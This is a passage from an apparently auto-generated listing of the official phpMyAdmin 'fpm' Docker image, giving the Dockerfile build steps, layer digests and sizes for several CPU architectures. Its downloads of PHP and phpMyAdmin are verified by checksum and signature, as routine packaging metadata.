LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Wed, 31 Mar 2021 13:29:07 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 13:29:08 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Wed, 31 Mar 2021 13:29:09 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Wed, 31 Mar 2021 13:29:09 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Wed, 31 Mar 2021 13:29:09 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:17fa7bb8f5ce4138c383674409fef134204b2ae72f4a997a2cebccad07e8e32b`
Last Modified: Tue, 30 Mar 2021 22:16:21 GMT
Size: 25.8 MB (25806366 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:352cbf73d26a044699ae2f07261cb972fea9bcddf88ba2198123b5deda9e10f4`
Last Modified: Wed, 31 Mar 2021 02:51:35 GMT
Size: 228.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:719d1191368872841cbb21ecc69ac171357d4b1e986c7a460dcb0bc3d060f095`
Last Modified: Wed, 31 Mar 2021 02:52:26 GMT
Size: 61.4 MB (61403934 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:378cc22997f22b69d3ca6ba56580b5d4484b5ce25878d6418a118d57ba4f3901`
Last Modified: Wed, 31 Mar 2021 02:51:33 GMT
Size: 225.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:455d8dadc848c5700ba333cbec67367c629aec69fad1c5b01e9e90eb0ee66295`
Last Modified: Wed, 31 Mar 2021 02:57:41 GMT
Size: 10.7 MB (10653547 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:af62ca65b964ace7379c2f456310ea0c2cdc442e2ca5cde1fb518d83617b6cf5`
Last Modified: Wed, 31 Mar 2021 02:57:35 GMT
Size: 491.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:4196270806704543539f9b562acdc331ae0296e2e15b8b04ac05af4a5c3905d3`
Last Modified: Wed, 31 Mar 2021 02:57:55 GMT
Size: 28.0 MB (27950685 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f379443061bf3e47dc86549f33192e18245dd86df64d2ffbddd07bc8f54bcb89`
Last Modified: Wed, 31 Mar 2021 02:57:35 GMT
Size: 2.3 KB (2268 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f6e9b690e51359d8c3c48b92beb02c2680811256cb510f3330ed4bac535eb041`
Last Modified: Wed, 31 Mar 2021 02:57:35 GMT
Size: 248.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ee649ce0aa8a119be500557d09960ee0272440539858cf02191ea9aa648f3fd7`
Last Modified: Wed, 31 Mar 2021 02:57:35 GMT
Size: 8.4 KB (8446 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e5627b00853990ba5c51a50f8f816d8ec446b45e664bd7763773704449d90b4a`
Last Modified: Wed, 31 Mar 2021 13:30:26 GMT
Size: 2.8 MB (2785447 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:77668e90b04cbfd3fd302e4d5ad735411aa528f49efbdcfb2be0f26707b58846`
Last Modified: Wed, 31 Mar 2021 13:30:25 GMT
Size: 546.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:b2837ad6292d432c97d70d15710f660b0e13a480c2ffe5603930b1d2c874f2f1`
Last Modified: Wed, 31 Mar 2021 13:30:37 GMT
Size: 14.1 MB (14065327 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:de9cb5bb23178c556746faa3eb6f61c44e186ecdda84c4248e59837b0d17c660`
Last Modified: Wed, 31 Mar 2021 13:30:24 GMT
Size: 1.5 KB (1499 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:8f2bf631f5bb4bb1da01f9476ad5a19d052ae494272b30c67024f60d04dd523a`
Last Modified: Wed, 31 Mar 2021 13:30:24 GMT
Size: 771.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `phpmyadmin:fpm` - linux; ppc64le
```console
$ docker pull phpmyadmin@sha256:90b4e85e59a65d3ce6136a87454bd47fd452752ffc1a39c76113641db2de3a18
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **171.0 MB (170971401 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:7b28a1e26f69524f61cbfd5ec96214af3cd6650e2594cafcdca28d0bb4ebca59`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 22:36:03 GMT
ADD file:a544303d3ec263b38c231310d807e05249140188df5c5a5c785b2f176455ac39 in /
# Tue, 30 Mar 2021 22:36:09 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 11:09:36 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 11:09:39 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 11:12:53 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 11:13:06 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 11:13:18 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 11:31:45 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 11:31:48 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 11:31:53 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 11:31:58 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 12:04:24 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 12:04:28 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 12:04:31 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 12:04:35 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 12:06:46 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 12:06:48 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 12:11:14 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 12:11:21 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 12:11:37 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 12:11:43 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 12:11:45 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 12:11:53 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 12:11:56 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 12:11:58 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 12:12:00 GMT
CMD ["php-fpm"]
# Thu, 01 Apr 2021 09:24:08 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 09:24:10 GMT
ENV MAX_EXECUTION_TIME=600
# Thu, 01 Apr 2021 09:24:12 GMT
ENV MEMORY_LIMIT=512M
# Thu, 01 Apr 2021 09:24:15 GMT
ENV UPLOAD_LIMIT=2048K
# Thu, 01 Apr 2021 09:24:25 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Thu, 01 Apr 2021 09:24:29 GMT
ENV VERSION=5.1.0
# Thu, 01 Apr 2021 09:24:32 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Thu, 01 Apr 2021 09:24:40 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Thu, 01 Apr 2021 09:24:46 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Thu, 01 Apr 2021 09:26:33 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 09:26:46 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Thu, 01 Apr 2021 09:26:56 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Thu, 01 Apr 2021 09:27:07 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Thu, 01 Apr 2021 09:27:12 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:c840eb5e9aed613b2af7557a4b5ad46898b8bc475a2d470c65ec7896b11282f1`
Last Modified: Tue, 30 Mar 2021 22:42:39 GMT
Size: 30.5 MB (30545907 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:609c2a62923b5b74c89e0e6a2975907d38aaa4e4c04d3a1c50454f163d588a55`
Last Modified: Wed, 31 Mar 2021 12:55:54 GMT
Size: 229.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:aab5446013ea62187f1851814ee5a76ef3a061d2679ada7116792838147e136e`
Last Modified: Wed, 31 Mar 2021 12:56:12 GMT
Size: 82.3 MB (82290930 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:00b7faded87e67bbc5dbb85edd1f7549536cb4ac88fed061610320ac232046ea`
Last Modified: Wed, 31 Mar 2021 12:55:52 GMT
Size: 270.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9120cd3194c261c8c8d41dca36e7bfc464e70b4825fc2bd36a31dc704bc107d9`
Last Modified: Wed, 31 Mar 2021 13:00:25 GMT
Size: 10.7 MB (10656267 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d296600e09d03777ac8a19f06bb6e1f668ea3da7002270871be22334253f3c8f`
Last Modified: Wed, 31 Mar 2021 13:00:17 GMT
Size: 491.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9365c50428f4e16ba237dfbe4933d0162e191564af9000a545378232dd4a238b`
Last Modified: Wed, 31 Mar 2021 13:00:24 GMT
Size: 30.3 MB (30258207 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:070aceba451b8fa2149b44cdf55a5e9c1827729d08e8582fe924796a9bc4a90e`
Last Modified: Wed, 31 Mar 2021 13:00:17 GMT
Size: 2.3 KB (2271 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a177f5261ae42b6f3af9affbbd793adf920649ea81cfd77a70cf2eafea3f1478`
Last Modified: Wed, 31 Mar 2021 13:00:17 GMT
Size: 248.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:09e5fff19229ac55b38f85bb403498abbee48cae5ebf0d32a3bf7b57ef3f9179`
Last Modified: Wed, 31 Mar 2021 13:00:18 GMT
Size: 8.4 KB (8447 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:68f8bb16351d09d4959eaae782fc66e41b5cca28e0ab116e28774fdafae99cc2`
Last Modified: Thu, 01 Apr 2021 09:28:42 GMT
Size: 3.1 MB (3139850 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:1b3cbe414a42329792ba2067c473afff6ee6c9844cf525116075eb3974d598bd`
Last Modified: Thu, 01 Apr 2021 09:28:41 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:3c4fdd03de7c25576ee20f4549c6982bf904014bd7712208e6338c73d8188d07`
Last Modified: Thu, 01 Apr 2021 09:28:45 GMT
Size: 14.1 MB (14065438 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:bc0b3b03ba30b1464c46ec05bba1f3e0581f83011c0566d9dad075c7344a8bba`
Last Modified: Thu, 01 Apr 2021 09:28:41 GMT
Size: 1.5 KB (1527 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:46d88d0c0e1d8171a33bcf08bab53585ab84ae9cfab005b0024de9d292cfc3a9`
Last Modified: Thu, 01 Apr 2021 09:28:41 GMT
Size: 772.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `phpmyadmin:fpm` - linux; s390x
```console
$ docker pull phpmyadmin@sha256:b0761e58e92f678f5cebfec6eb5db7d94a21a15fb538d6ba3c58b7a1f359950d
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **145.7 MB (145685876 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:bddc686fe2b46276302dbd35d2694c827a177d9bae5c25495b842bbf1ea3b153`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 21:42:45 GMT
ADD file:df31b107763f0c1cce4527f1e2152ee5b995aa1d062c457c2852bea8dadab8a6 in /
# Tue, 30 Mar 2021 21:42:46 GMT
CMD ["bash"]
# Tue, 30 Mar 2021 23:59:29 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Tue, 30 Mar 2021 23:59:29 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Tue, 30 Mar 2021 23:59:53 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Tue, 30 Mar 2021 23:59:58 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Tue, 30 Mar 2021 23:59:59 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 00:09:14 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 00:09:14 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 00:09:15 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 00:09:15 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 00:21:20 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 00:21:21 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 00:21:22 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 00:21:22 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 00:21:36 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 00:21:37 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 00:25:05 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 00:25:08 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 00:25:08 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 00:25:09 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 00:25:09 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 00:25:10 GMT
